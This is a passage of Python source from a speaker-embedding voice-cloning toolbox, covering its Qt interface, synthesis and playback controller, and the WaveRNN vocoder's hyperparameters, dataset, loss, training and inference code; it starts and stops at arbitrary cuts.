root_layout.addLayout(vis_layout, 1, 1, 1, 3) ## Projections # UMap fig, self.umap_ax = plt.subplots(figsize=(3, 3), facecolor="#F0F0F0") fig.subplots_adjust(left=0.02, bottom=0.02, right=0.98, top=0.98) self.projections_layout.addWidget(FigureCanvas(fig)) self.umap_hot = False self.clear_button = QPushButton("Clear") self.projections_layout.addWidget(self.clear_button) ## Browser # Dataset, speaker and utterance selection i = 0 self.dataset_box = QComboBox() browser_layout.addWidget(QLabel("<b>Dataset</b>"), i, 0) browser_layout.addWidget(self.dataset_box, i + 1, 0) self.speaker_box = QComboBox() browser_layout.addWidget(QLabel("<b>Speaker</b>"), i, 1) browser_layout.addWidget(self.speaker_box, i + 1, 1) self.utterance_box = QComboBox() browser_layout.addWidget(QLabel("<b>Utterance</b>"), i, 2) browser_layout.addWidget(self.utterance_box, i + 1, 2) self.browser_load_button = QPushButton("Load") browser_layout.addWidget(self.browser_load_button, i + 1, 3) i += 2 # Random buttons self.random_dataset_button = QPushButton("Random") browser_layout.addWidget(self.random_dataset_button, i, 0) self.random_speaker_button = QPushButton("Random") browser_layout.addWidget(self.random_speaker_button, i, 1) self.random_utterance_button = QPushButton("Random") browser_layout.addWidget(self.random_utterance_button, i, 2) self.auto_next_checkbox = QCheckBox("Auto select next") self.auto_next_checkbox.setChecked(True) browser_layout.addWidget(self.auto_next_checkbox, i, 3) i += 1 # Utterance box browser_layout.addWidget(QLabel("<b>Use embedding from:</b>"), i, 0) self.utterance_history = QComboBox() browser_layout.addWidget(self.utterance_history, i, 1, 1, 3) i += 1 # Random & next utterance buttons self.browser_browse_button = QPushButton("Browse") browser_layout.addWidget(self.browser_browse_button, i, 0) self.record_button = QPushButton("Record") browser_layout.addWidget(self.record_button, i, 1) self.play_button = QPushButton("Play") browser_layout.addWidget(self.play_button, i, 2) self.stop_button = QPushButton("Stop") browser_layout.addWidget(self.stop_button, i, 3) i += 1 # Model and audio output selection self.encoder_box = QComboBox() browser_layout.addWidget(QLabel("<b>Encoder</b>"), i, 0) browser_layout.addWidget(self.encoder_box, i + 1, 0) self.synthesizer_box = QComboBox() browser_layout.addWidget(QLabel("<b>Synthesizer</b>"), i, 1) browser_layout.addWidget(self.synthesizer_box, i + 1, 1) self.vocoder_box = QComboBox() browser_layout.addWidget(QLabel("<b>Vocoder</b>"), i, 2) browser_layout.addWidget(self.vocoder_box, i + 1, 2) self.audio_out_devices_cb=QComboBox() browser_layout.addWidget(QLabel("<b>Audio Output</b>"), i, 3) browser_layout.addWidget(self.audio_out_devices_cb, i + 1, 3) i += 2 #Replay & Save Audio browser_layout.addWidget(QLabel("<b>Toolbox Output:</b>"), i, 0) self.waves_cb = QComboBox() self.waves_cb_model = QStringListModel() self.waves_cb.setModel(self.waves_cb_model) self.waves_cb.setToolTip("Select one of the last generated waves in this section for replaying or exporting") browser_layout.addWidget(self.waves_cb, i, 1) self.replay_wav_button = QPushButton("Replay") self.replay_wav_button.setToolTip("Replay last generated vocoder") browser_layout.addWidget(self.replay_wav_button, i, 2) self.export_wav_button = QPushButton("Export") self.export_wav_button.setToolTip("Save last generated vocoder audio in filesystem as a wav file") browser_layout.addWidget(self.export_wav_button, i, 3) i += 1 ## Embed & spectrograms vis_layout.addStretch() gridspec_kw = {"width_ratios": [1, 4]} fig, self.current_ax = plt.subplots(1, 2, figsize=(10, 2.25), facecolor="#F0F0F0", gridspec_kw=gridspec_kw) fig.subplots_adjust(left=0, bottom=0.1, right=1, top=0.8) vis_layout.addWidget(FigureCanvas(fig)) fig, self.gen_ax = plt.subplots(1, 2, figsize=(10, 2.25), facecolor="#F0F0F0", gridspec_kw=gridspec_kw) fig.subplots_adjust(left=0, bottom=0.1, right=1, top=0.8) vis_layout.addWidget(FigureCanvas(fig)) for ax in self.current_ax.tolist() + self.gen_ax.tolist(): ax.set_facecolor("#F0F0F0") for side in ["top", "right", "bottom", "left"]: ax.spines[side].set_visible(False) ## Generation self.text_prompt = QPlainTextEdit(default_text) gen_layout.addWidget(self.text_prompt, stretch=1) self.generate_button = QPushButton("Synthesize and vocode") gen_layout.addWidget(self.generate_button) layout = QHBoxLayout() self.synthesize_button = QPushButton("Synthesize only") layout.addWidget(self.synthesize_button) self.vocode_button = QPushButton("Vocode only") layout.addWidget(self.vocode_button) gen_layout.addLayout(layout) layout_seed = QGridLayout() self.random_seed_checkbox = QCheckBox("Random seed:") self.random_seed_checkbox.setToolTip("When checked, makes the synthesizer and vocoder deterministic.") layout_seed.addWidget(self.random_seed_checkbox, 0, 0) self.seed_textbox = QLineEdit() self.seed_textbox.setMaximumWidth(80) layout_seed.addWidget(self.seed_textbox, 0, 1) self.trim_silences_checkbox = QCheckBox("Enhance vocoder output") self.trim_silences_checkbox.setToolTip("When checked, trims excess silence in vocoder output." " This feature requires `webrtcvad` to be installed.") layout_seed.addWidget(self.trim_silences_checkbox, 0, 2, 1, 2) gen_layout.addLayout(layout_seed) self.loading_bar = QProgressBar() gen_layout.addWidget(self.loading_bar) self.log_window = QLabel() self.log_window.setAlignment(Qt.AlignBottom | Qt.AlignLeft) gen_layout.addWidget(self.log_window) self.logs = [] gen_layout.addStretch() ## Set the size of the window and of the elements max_size = QDesktopWidget().availableGeometry(self).size() * 0.8 self.resize(max_size) ## Finalize the display self.reset_interface() self.show() def start(self): self.app.exec_() File: toolbox/__init__.py import sys import traceback from pathlib import Path from time import perf_counter as timer import numpy as np import torch from encoder import inference as encoder from synthesizer.inference import Synthesizer from toolbox.ui import UI from toolbox.utterance import Utterance from vocoder import inference as vocoder # Use this directory structure for your datasets, or modify it to fit your needs recognized_datasets = [ "LibriSpeech/dev-clean", "LibriSpeech/dev-other", "LibriSpeech/test-clean", "LibriSpeech/test-other", "LibriSpeech/train-clean-100", "LibriSpeech/train-clean-360", "LibriSpeech/train-other-500", "LibriTTS/dev-clean", "LibriTTS/dev-other", "LibriTTS/test-clean", "LibriTTS/test-other", "LibriTTS/train-clean-100", "LibriTTS/train-clean-360", "LibriTTS/train-other-500", "LJSpeech-1.1", "VoxCeleb1/wav", "VoxCeleb1/test_wav", "VoxCeleb2/dev/aac", "VoxCeleb2/test/aac", "VCTK-Corpus/wav48", ] # Maximum of generated wavs to keep on memory MAX_WAVS = 15 class Toolbox: def __init__(self, datasets_root: Path, models_dir: Path, seed: int=None): sys.excepthook = self.excepthook self.datasets_root = datasets_root self.utterances = set() self.current_generated = (None, None, None, None) # speaker_name, spec, breaks, wav self.synthesizer = None # type: Synthesizer self.current_wav = None self.waves_list = [] self.waves_count = 0 self.waves_namelist = [] # Check for webrtcvad (enables removal of silences in vocoder output) try: import webrtcvad self.trim_silences = True except: self.trim_silences = False # Initialize the events and the interface self.ui = UI() self.reset_ui(models_dir, seed) self.setup_events() self.ui.start() def excepthook(self, exc_type, exc_value, exc_tb): traceback.print_exception(exc_type, exc_value, exc_tb) self.ui.log("Exception: %s" % exc_value) def setup_events(self): # Dataset, speaker and utterance selection self.ui.browser_load_button.clicked.connect(lambda: self.load_from_browser()) random_func = lambda level: lambda: self.ui.populate_browser(self.datasets_root, recognized_datasets, level) self.ui.random_dataset_button.clicked.connect(random_func(0)) self.ui.random_speaker_button.clicked.connect(random_func(1)) self.ui.random_utterance_button.clicked.connect(random_func(2)) self.ui.dataset_box.currentIndexChanged.connect(random_func(1)) self.ui.speaker_box.currentIndexChanged.connect(random_func(2)) # Model selection self.ui.encoder_box.currentIndexChanged.connect(self.init_encoder) def func(): self.synthesizer = None self.ui.synthesizer_box.currentIndexChanged.connect(func) self.ui.vocoder_box.currentIndexChanged.connect(self.init_vocoder) # Utterance selection func = lambda: self.load_from_browser(self.ui.browse_file()) self.ui.browser_browse_button.clicked.connect(func) func = lambda: self.ui.draw_utterance(self.ui.selected_utterance, "current") self.ui.utterance_history.currentIndexChanged.connect(func) func = lambda: self.ui.play(self.ui.selected_utterance.wav, Synthesizer.sample_rate) self.ui.play_button.clicked.connect(func) self.ui.stop_button.clicked.connect(self.ui.stop) self.ui.record_button.clicked.connect(self.record) #Audio self.ui.setup_audio_devices(Synthesizer.sample_rate) #Wav playback & save func = lambda: self.replay_last_wav() self.ui.replay_wav_button.clicked.connect(func) func = lambda: self.export_current_wave() self.ui.export_wav_button.clicked.connect(func) self.ui.waves_cb.currentIndexChanged.connect(self.set_current_wav) # Generation func = lambda: self.synthesize() or self.vocode() self.ui.generate_button.clicked.connect(func) self.ui.synthesize_button.clicked.connect(self.synthesize) self.ui.vocode_button.clicked.connect(self.vocode) self.ui.random_seed_checkbox.clicked.connect(self.update_seed_textbox) # UMAP legend self.ui.clear_button.clicked.connect(self.clear_utterances) def set_current_wav(self, index): self.current_wav = self.waves_list[index] def export_current_wave(self): self.ui.save_audio_file(self.current_wav, Synthesizer.sample_rate) def replay_last_wav(self): self.ui.play(self.current_wav, Synthesizer.sample_rate) def reset_ui(self, models_dir: Path, seed: int=None): self.ui.populate_browser(self.datasets_root, recognized_datasets, 0, True) self.ui.populate_models(models_dir) self.ui.populate_gen_options(seed, self.trim_silences) def load_from_browser(self, fpath=None): if fpath is None: fpath = Path(self.datasets_root, self.ui.current_dataset_name, self.ui.current_speaker_name, self.ui.current_utterance_name) name = str(fpath.relative_to(self.datasets_root)) speaker_name = self.ui.current_dataset_name + '_' + self.ui.current_speaker_name # Select the next utterance if self.ui.auto_next_checkbox.isChecked(): self.ui.browser_select_next() elif fpath == "": return else: name = fpath.name speaker_name = fpath.parent.name # Get the wav from the disk. We take the wav with the vocoder/synthesizer format for # playback, so as to have a fair comparison with the generated audio wav = Synthesizer.load_preprocess_wav(fpath) self.ui.log("Loaded %s" % name) self.add_real_utterance(wav, name, speaker_name) def record(self): wav = self.ui.record_one(encoder.sampling_rate, 5) if wav is None: return self.ui.play(wav, encoder.sampling_rate) speaker_name = "user01" name = speaker_name + "_rec_%05d" % np.random.randint(100000) self.add_real_utterance(wav, name, speaker_name) def add_real_utterance(self, wav, name, speaker_name): # Compute the mel spectrogram spec = Synthesizer.make_spectrogram(wav) self.ui.draw_spec(spec, "current") # Compute the embedding if not encoder.is_loaded(): self.init_encoder() encoder_wav = encoder.preprocess_wav(wav) embed, partial_embeds, _ = encoder.embed_utterance(encoder_wav, return_partials=True) # Add the utterance utterance = Utterance(name, speaker_name, wav, spec, embed, partial_embeds, False) self.utterances.add(utterance) self.ui.register_utterance(utterance) # Plot it self.ui.draw_embed(embed, name, "current") self.ui.draw_umap_projections(self.utterances) def clear_utterances(self): self.utterances.clear() self.ui.draw_umap_projections(self.utterances) def synthesize(self): self.ui.log("Generating the mel spectrogram...") self.ui.set_loading(1) # Update the synthesizer random seed if self.ui.random_seed_checkbox.isChecked(): seed = int(self.ui.seed_textbox.text()) self.ui.populate_gen_options(seed, self.trim_silences) else: seed = None if seed is not None: torch.manual_seed(seed) # Synthesize the spectrogram if self.synthesizer is None or seed is not None: self.init_synthesizer() texts = self.ui.text_prompt.toPlainText().split("\n") embed = self.ui.selected_utterance.embed embeds = [embed] * len(texts) specs = self.synthesizer.synthesize_spectrograms(texts, embeds) breaks = [spec.shape[1] for spec in specs] spec = np.concatenate(specs, axis=1) self.ui.draw_spec(spec, "generated") self.current_generated = (self.ui.selected_utterance.speaker_name, spec, breaks, None) self.ui.set_loading(0) def vocode(self): speaker_name, spec, breaks, _ = self.current_generated assert spec is not None # Initialize the vocoder model and make it determinstic, if user provides a seed if self.ui.random_seed_checkbox.isChecked(): seed = int(self.ui.seed_textbox.text()) self.ui.populate_gen_options(seed, self.trim_silences) else: seed = None if seed is not None: torch.manual_seed(seed) # Synthesize the waveform if not vocoder.is_loaded() or seed is not None: self.init_vocoder() def vocoder_progress(i, seq_len, b_size, gen_rate): real_time_factor = (gen_rate / Synthesizer.sample_rate) * 1000 line = "Waveform generation: %d/%d (batch size: %d, rate: %.1fkHz - %.2fx real time)" \ % (i * b_size, seq_len * b_size, b_size, gen_rate, real_time_factor) self.ui.log(line, "overwrite") self.ui.set_loading(i, seq_len) if self.ui.current_vocoder_fpath is not None: self.ui.log("") wav = vocoder.infer_waveform(spec, progress_callback=vocoder_progress) else: self.ui.log("Waveform generation with Griffin-Lim... ") wav = Synthesizer.griffin_lim(spec) self.ui.set_loading(0) self.ui.log(" Done!", "append") # Add breaks b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size) b_starts = np.concatenate(([0], b_ends[:-1])) wavs = [wav[start:end] for start, end, in zip(b_starts, b_ends)] breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks) wav = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)]) # Trim excessive silences if self.ui.trim_silences_checkbox.isChecked(): wav = encoder.preprocess_wav(wav) # Play it wav = wav / np.abs(wav).max() * 0.97 self.ui.play(wav, Synthesizer.sample_rate) # Name it (history displayed in combobox) # TODO better naming for the combobox items? wav_name = str(self.waves_count + 1) #Update waves combobox self.waves_count += 1 if self.waves_count > MAX_WAVS: self.waves_list.pop() self.waves_namelist.pop() self.waves_list.insert(0, wav) self.waves_namelist.insert(0, wav_name) self.ui.waves_cb.disconnect() self.ui.waves_cb_model.setStringList(self.waves_namelist) self.ui.waves_cb.setCurrentIndex(0) self.ui.waves_cb.currentIndexChanged.connect(self.set_current_wav) # Update current wav self.set_current_wav(0) #Enable replay and save buttons: self.ui.replay_wav_button.setDisabled(False) self.ui.export_wav_button.setDisabled(False) # Compute the embedding # TODO: this is problematic with different sampling rates, gotta fix it if not encoder.is_loaded(): self.init_encoder() encoder_wav = encoder.preprocess_wav(wav) embed, partial_embeds, _ = encoder.embed_utterance(encoder_wav, return_partials=True) # Add the utterance name = speaker_name + "_gen_%05d" % np.random.randint(100000) utterance = Utterance(name, speaker_name, wav, spec, embed, partial_embeds, True) self.utterances.add(utterance) # Plot it self.ui.draw_embed(embed, name, "generated") self.ui.draw_umap_projections(self.utterances) def init_encoder(self): model_fpath = self.ui.current_encoder_fpath self.ui.log("Loading the encoder %s... " % model_fpath) self.ui.set_loading(1) start = timer() encoder.load_model(model_fpath) self.ui.log("Done (%dms)." % int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def init_synthesizer(self): model_fpath = self.ui.current_synthesizer_fpath self.ui.log("Loading the synthesizer %s... " % model_fpath) self.ui.set_loading(1) start = timer() self.synthesizer = Synthesizer(model_fpath) self.ui.log("Done (%dms)." % int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def init_vocoder(self): model_fpath = self.ui.current_vocoder_fpath # Case of Griffin-lim if model_fpath is None: return self.ui.log("Loading the vocoder %s... " % model_fpath) self.ui.set_loading(1) start = timer() vocoder.load_model(model_fpath) self.ui.log("Done (%dms)." % int(1000 * (timer() - start)), "append") self.ui.set_loading(0) def update_seed_textbox(self): self.ui.update_seed_textbox() File: vocoder/hparams.py from synthesizer.hparams import hparams as _syn_hp # Audio settings------------------------------------------------------------------------ # Match the values of the synthesizer sample_rate = _syn_hp.sample_rate n_fft = _syn_hp.n_fft num_mels = _syn_hp.num_mels hop_length = _syn_hp.hop_size win_length = _syn_hp.win_size fmin = _syn_hp.fmin min_level_db = _syn_hp.min_level_db ref_level_db = _syn_hp.ref_level_db mel_max_abs_value = _syn_hp.max_abs_value preemphasis = _syn_hp.preemphasis apply_preemphasis = _syn_hp.preemphasize bits = 9 # bit depth of signal mu_law = True # Recommended to suppress noise if using raw bits in hp.voc_mode # below # WAVERNN / VOCODER -------------------------------------------------------------------------------- voc_mode = 'RAW' # either 'RAW' (softmax on raw bits) or 'MOL' (sample from # mixture of logistics) voc_upsample_factors = (5, 5, 8) # NB - this needs to correctly factorise hop_length voc_rnn_dims = 512 voc_fc_dims = 512 voc_compute_dims = 128 voc_res_out_dims = 128 voc_res_blocks = 10 # Training voc_batch_size = 100 voc_lr = 1e-4 voc_gen_at_checkpoint = 5 # number of samples to generate at each checkpoint voc_pad = 2 # this will pad the input so that the resnet can 'see' wider # than input length voc_seq_len = hop_length * 5 # must be a multiple of hop_length # Generating / Synthesizing voc_gen_batched = True # very fast (realtime+) single utterance batched generation voc_target = 8000 # target number of samples to be generated in each batch entry voc_overlap = 400 # number of samples for crossfading between batches File: vocoder/vocoder_dataset.py from torch.utils.data import Dataset from pathlib import Path from vocoder import audio import vocoder.hparams as hp import numpy as np import torch class VocoderDataset(Dataset): def __init__(self, metadata_fpath: Path, mel_dir: Path, wav_dir: Path): print("Using inputs from:\n\t%s\n\t%s\n\t%s" % (metadata_fpath, mel_dir, wav_dir)) with metadata_fpath.open("r") as metadata_file: metadata = [line.split("|") for line in metadata_file] gta_fnames = [x[1] for x in metadata if int(x[4])] gta_fpaths = [mel_dir.joinpath(fname) for fname in gta_fnames] wav_fnames = [x[0] for x in metadata if int(x[4])] wav_fpaths = [wav_dir.joinpath(fname) for fname in wav_fnames] self.samples_fpaths = list(zip(gta_fpaths, wav_fpaths)) print("Found %d samples" % len(self.samples_fpaths)) def __getitem__(self, index): mel_path, wav_path = self.samples_fpaths[index] # Load the mel spectrogram and adjust its range to [-1, 1] mel = np.load(mel_path).T.astype(np.float32) / hp.mel_max_abs_value # Load the wav wav = np.load(wav_path) if hp.apply_preemphasis: wav = audio.pre_emphasis(wav) wav = np.clip(wav, -1, 1) # Fix for missing padding # TODO: settle on whether this is any useful r_pad = (len(wav) // hp.hop_length + 1) * hp.hop_length - len(wav) wav = np.pad(wav, (0, r_pad), mode='constant') assert len(wav) >= mel.shape[1] * hp.hop_length wav = wav[:mel.shape[1] * hp.hop_length] assert len(wav) % hp.hop_length == 0 # Quantize the wav if hp.voc_mode == 'RAW': if hp.mu_law: quant = audio.encode_mu_law(wav, mu=2 ** hp.bits) else: quant = audio.float_2_label(wav, bits=hp.bits) elif hp.voc_mode == 'MOL': quant = audio.float_2_label(wav, bits=16) return mel.astype(np.float32), quant.astype(np.int64) def __len__(self): return len(self.samples_fpaths) def collate_vocoder(batch): mel_win = hp.voc_seq_len // hp.hop_length + 2 * hp.voc_pad max_offsets = [x[0].shape[-1] -2 - (mel_win + 2 * hp.voc_pad) for x in batch] mel_offsets = [np.random.randint(0, offset) for offset in max_offsets] sig_offsets = [(offset + hp.voc_pad) * hp.hop_length for offset in mel_offsets] mels = [x[0][:, mel_offsets[i]:mel_offsets[i] + mel_win] for i, x in enumerate(batch)] labels = [x[1][sig_offsets[i]:sig_offsets[i] + hp.voc_seq_len + 1] for i, x in enumerate(batch)] mels = np.stack(mels).astype(np.float32) labels = np.stack(labels).astype(np.int64) mels = torch.tensor(mels) labels = torch.tensor(labels).long() x = labels[:, :hp.voc_seq_len] y = labels[:, 1:] bits = 16 if hp.voc_mode == 'MOL' else hp.bits x = audio.label_2_float(x.float(), bits) if hp.voc_mode == 'MOL' : y = audio.label_2_float(y.float(), bits) return x, y, mels File: vocoder/display.py import time import numpy as np import sys def progbar(i, n, size=16): done = (i * size) // n bar = '' for i in range(size): bar += '█' if i <= done else '░' return bar def stream(message) : try: sys.stdout.write("\r{%s}" % message) except: #Remove non-ASCII characters from message message = ''.join(i for i in message if ord(i)<128) sys.stdout.write("\r{%s}" % message) def simple_table(item_tuples) : border_pattern = '+---------------------------------------' whitespace = ' ' headings, cells, = [], [] for item in item_tuples : heading, cell = str(item[0]), str(item[1]) pad_head = True if len(heading) < len(cell) else False pad = abs(len(heading) - len(cell)) pad = whitespace[:pad] pad_left = pad[:len(pad)//2] pad_right = pad[len(pad)//2:] if pad_head : heading = pad_left + heading + pad_right else : cell = pad_left + cell + pad_right headings += [heading] cells += [cell] border, head, body = '', '', '' for i in range(len(item_tuples)) : temp_head = f'| {headings[i]} ' temp_body = f'| {cells[i]} ' border += border_pattern[:len(temp_head)] head += temp_head body += temp_body if i == len(item_tuples) - 1 : head += '|' body += '|' border += '+' print(border) print(head) print(border) print(body) print(border) print(' ') def time_since(started) : elapsed = time.time() - started m = int(elapsed // 60) s = int(elapsed % 60) if m >= 60 : h = int(m // 60) m = m % 60 return f'{h}h {m}m {s}s' else : return f'{m}m {s}s' def save_attention(attn, path): import matplotlib.pyplot as plt fig = plt.figure(figsize=(12, 6)) plt.imshow(attn.T, interpolation='nearest', aspect='auto') fig.savefig(f'{path}.png', bbox_inches='tight') plt.close(fig) def save_spectrogram(M, path, length=None): import matplotlib.pyplot as plt M = np.flip(M, axis=0) if length : M = M[:, :length] fig = plt.figure(figsize=(12, 6)) plt.imshow(M, interpolation='nearest', aspect='auto') fig.savefig(f'{path}.png', bbox_inches='tight') plt.close(fig) def plot(array): import matplotlib.pyplot as plt fig = plt.figure(figsize=(30, 5)) ax = fig.add_subplot(111) ax.xaxis.label.set_color('grey') ax.yaxis.label.set_color('grey') ax.xaxis.label.set_fontsize(23) ax.yaxis.label.set_fontsize(23) ax.tick_params(axis='x', colors='grey', labelsize=23) ax.tick_params(axis='y', colors='grey', labelsize=23) plt.plot(array) def plot_spec(M): import matplotlib.pyplot as plt M = np.flip(M, axis=0) plt.figure(figsize=(18,4)) plt.imshow(M, interpolation='nearest', aspect='auto') plt.show() File: vocoder/distribution.py import numpy as np import torch import torch.nn.functional as F def log_sum_exp(x): """ numerically stable log_sum_exp implementation that prevents overflow """ # TF ordering axis = len(x.size()) - 1 m, _ = torch.max(x, dim=axis) m2, _ = torch.max(x, dim=axis, keepdim=True) return m + torch.log(torch.sum(torch.exp(x - m2), dim=axis)) # It is adapted from https://github.com/r9y9/wavenet_vocoder/blob/master/wavenet_vocoder/mixture.py def discretized_mix_logistic_loss(y_hat, y, num_classes=65536, log_scale_min=None, reduce=True): if log_scale_min is None: log_scale_min = float(np.log(1e-14)) y_hat = y_hat.permute(0,2,1) assert y_hat.dim() == 3 assert y_hat.size(1) % 3 == 0 nr_mix = y_hat.size(1) // 3 # (B x T x C) y_hat = y_hat.transpose(1, 2) # unpack parameters. (B, T, num_mixtures) x 3 logit_probs = y_hat[:, :, :nr_mix] means = y_hat[:, :, nr_mix:2 * nr_mix] log_scales = torch.clamp(y_hat[:, :, 2 * nr_mix:3 * nr_mix], min=log_scale_min) # B x T x 1 -> B x T x num_mixtures y = y.expand_as(means) centered_y = y - means inv_stdv = torch.exp(-log_scales) plus_in = inv_stdv * (centered_y + 1. / (num_classes - 1)) cdf_plus = torch.sigmoid(plus_in) min_in = inv_stdv * (centered_y - 1. / (num_classes - 1)) cdf_min = torch.sigmoid(min_in) # log probability for edge case of 0 (before scaling) # equivalent: torch.log(F.sigmoid(plus_in)) log_cdf_plus = plus_in - F.softplus(plus_in) # log probability for edge case of 255 (before scaling) # equivalent: (1 - F.sigmoid(min_in)).log() log_one_minus_cdf_min = -F.softplus(min_in) # probability for all other cases cdf_delta = cdf_plus - cdf_min mid_in = inv_stdv * centered_y # log probability in the center of the bin, to be used in extreme cases # (not actually used in our code) log_pdf_mid = mid_in - log_scales - 2. * F.softplus(mid_in) # tf equivalent """ log_probs = tf.where(x < -0.999, log_cdf_plus, tf.where(x > 0.999, log_one_minus_cdf_min, tf.where(cdf_delta > 1e-5, tf.log(tf.maximum(cdf_delta, 1e-12)), log_pdf_mid - np.log(127.5)))) """ # TODO: cdf_delta <= 1e-5 actually can happen. How can we choose the value # for num_classes=65536 case? 1e-7? not sure.. inner_inner_cond = (cdf_delta > 1e-5).float() inner_inner_out = inner_inner_cond * \ torch.log(torch.clamp(cdf_delta, min=1e-12)) + \ (1. - inner_inner_cond) * (log_pdf_mid - np.log((num_classes - 1) / 2)) inner_cond = (y > 0.999).float() inner_out = inner_cond * log_one_minus_cdf_min + (1. - inner_cond) * inner_inner_out cond = (y < -0.999).float() log_probs = cond * log_cdf_plus + (1. - cond) * inner_out log_probs = log_probs + F.log_softmax(logit_probs, -1) if reduce: return -torch.mean(log_sum_exp(log_probs)) else: return -log_sum_exp(log_probs).unsqueeze(-1) def sample_from_discretized_mix_logistic(y, log_scale_min=None): """ Sample from discretized mixture of logistic distributions Args: y (Tensor): B x C x T log_scale_min (float): Log scale minimum value Returns: Tensor: sample in range of [-1, 1]. """ if log_scale_min is None: log_scale_min = float(np.log(1e-14)) assert y.size(1) % 3 == 0 nr_mix = y.size(1) // 3 # B x T x C y = y.transpose(1, 2) logit_probs = y[:, :, :nr_mix] # sample mixture indicator from softmax temp = logit_probs.data.new(logit_probs.size()).uniform_(1e-5, 1.0 - 1e-5) temp = logit_probs.data - torch.log(- torch.log(temp)) _, argmax = temp.max(dim=-1) # (B, T) -> (B, T, nr_mix) one_hot = to_one_hot(argmax, nr_mix) # select logistic parameters means = torch.sum(y[:, :, nr_mix:2 * nr_mix] * one_hot, dim=-1) log_scales = torch.clamp(torch.sum( y[:, :, 2 * nr_mix:3 * nr_mix] * one_hot, dim=-1), min=log_scale_min) # sample from logistic & clip to interval # we don't actually round to the nearest 8bit value when sampling u = means.data.new(means.size()).uniform_(1e-5, 1.0 - 1e-5) x = means + torch.exp(log_scales) * (torch.log(u) - torch.log(1. - u)) x = torch.clamp(torch.clamp(x, min=-1.), max=1.) return x def to_one_hot(tensor, n, fill_with=1.): # we perform one hot encore with respect to the last axis one_hot = torch.FloatTensor(tensor.size() + (n,)).zero_() if tensor.is_cuda: one_hot = one_hot.cuda() one_hot.scatter_(len(tensor.size()), tensor.unsqueeze(-1), fill_with) return one_hot File: vocoder/train.py import time from pathlib import Path import numpy as np import torch import torch.nn.functional as F from torch import optim from torch.utils.data import DataLoader import vocoder.hparams as hp from vocoder.display import stream, simple_table from vocoder.distribution import discretized_mix_logistic_loss from vocoder.gen_wavernn import gen_testset from vocoder.models.fatchord_version import WaveRNN from vocoder.vocoder_dataset import VocoderDataset, collate_vocoder def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_truth: bool, save_every: int, backup_every: int, force_restart: bool): # Check to make sure the hop length is correctly factorised assert np.cumprod(hp.voc_upsample_factors)[-1] == hp.hop_length # Instantiate the model print("Initializing the model...") model = WaveRNN( rnn_dims=hp.voc_rnn_dims, fc_dims=hp.voc_fc_dims, bits=hp.bits, pad=hp.voc_pad, upsample_factors=hp.voc_upsample_factors, feat_dims=hp.num_mels, compute_dims=hp.voc_compute_dims, res_out_dims=hp.voc_res_out_dims, res_blocks=hp.voc_res_blocks, hop_length=hp.hop_length, sample_rate=hp.sample_rate, mode=hp.voc_mode ) if torch.cuda.is_available(): model = model.cuda() # Initialize the optimizer optimizer = optim.Adam(model.parameters()) for p in optimizer.param_groups: p["lr"] = hp.voc_lr loss_func = F.cross_entropy if model.mode == "RAW" else discretized_mix_logistic_loss # Load the weights model_dir = models_dir / run_id model_dir.mkdir(exist_ok=True) weights_fpath = model_dir / "vocoder.pt" if force_restart or not weights_fpath.exists(): print("\nStarting the training of WaveRNN from scratch\n") model.save(weights_fpath, optimizer) else: print("\nLoading weights at %s" % weights_fpath) model.load(weights_fpath, optimizer) print("WaveRNN weights loaded from step %d" % model.step) # Initialize the dataset metadata_fpath = syn_dir.joinpath("train.txt") if ground_truth else \ voc_dir.joinpath("synthesized.txt") mel_dir = syn_dir.joinpath("mels") if ground_truth else voc_dir.joinpath("mels_gta") wav_dir = syn_dir.joinpath("audio") dataset = VocoderDataset(metadata_fpath, mel_dir, wav_dir) test_loader = DataLoader(dataset, batch_size=1, shuffle=True) # Begin the training simple_table([('Batch size', hp.voc_batch_size), ('LR', hp.voc_lr), ('Sequence Len', hp.voc_seq_len)]) for epoch in range(1, 350): data_loader = DataLoader(dataset, hp.voc_batch_size, shuffle=True, num_workers=2, collate_fn=collate_vocoder) start = time.time() running_loss = 0. for i, (x, y, m) in enumerate(data_loader, 1): if torch.cuda.is_available(): x, m, y = x.cuda(), m.cuda(), y.cuda() # Forward pass y_hat = model(x, m) if model.mode == 'RAW': y_hat = y_hat.transpose(1, 2).unsqueeze(-1) elif model.mode == 'MOL': y = y.float() y = y.unsqueeze(-1) # Backward pass loss = loss_func(y_hat, y) optimizer.zero_grad() loss.backward() optimizer.step() running_loss += loss.item() speed = i / (time.time() - start) avg_loss = running_loss / i step = model.get_step() k = step // 1000 if backup_every != 0 and step % backup_every == 0 : model.checkpoint(model_dir, optimizer) if save_every != 0 and step % save_every == 0 : model.save(weights_fpath, optimizer) msg = f"| Epoch: {epoch} ({i}/{len(data_loader)}) | " \ f"Loss: {avg_loss:.4f} | {speed:.1f} " \ f"steps/s | Step: {k}k | " stream(msg) gen_testset(model, test_loader, hp.voc_gen_at_checkpoint, hp.voc_gen_batched, hp.voc_target, hp.voc_overlap, model_dir) print("") File: vocoder/inference.py from vocoder.models.fatchord_version import WaveRNN from vocoder import hparams as hp import torch _model = None # type: WaveRNN def load_model(weights_fpath, verbose=True): global _model, _device if verbose: print("Building Wave-RNN") _model = WaveRNN( rnn_dims=hp.voc_rnn_dims, fc_dims=hp.voc_fc_dims, bits=hp.bits, pad=hp.voc_pad, upsample_factors=hp.voc_upsample_factors, feat_dims=hp.num_mels, compute_dims=hp.voc_compute_dims, res_out_dims=hp.voc_res_out_dims, res_blocks=hp.voc_res_blocks, hop_length=hp.hop_length, sample_rate=hp.sample_rate, mode=hp.voc_mode ) if torch.cuda.is_available(): _model = _model.cuda() _device = torch.device('cuda') else: _device = torch.device('cpu') if verbose: print("Loading model weights at %s" % weights_fpath) checkpoint = torch.load(weights_fpath, _device) _model.load_state_dict(checkpoint['model_state']) _model.eval() def is_loaded(): return _model is not None def infer_waveform(mel, normalize=True, batched=True, target=8000, overlap=800, progress_callback=None): """ Infers the waveform of a mel spectrogram output by the synthesizer (the format must match that of the synthesizer!) :param normalize: :param batched: :param target: :param overlap: :return: """ if _model is None: raise Exception("Please load Wave-RNN in memory before using it") if normalize: mel = mel / hp.mel_max_abs_value mel = torch.from_numpy(mel[None, ...]) wav = _model.generate(mel, batched, target, overlap, hp.mu_law, progress_callback) return wav File: vocoder/audio.py import math import numpy as np import librosa import vocoder.hparams as hp from 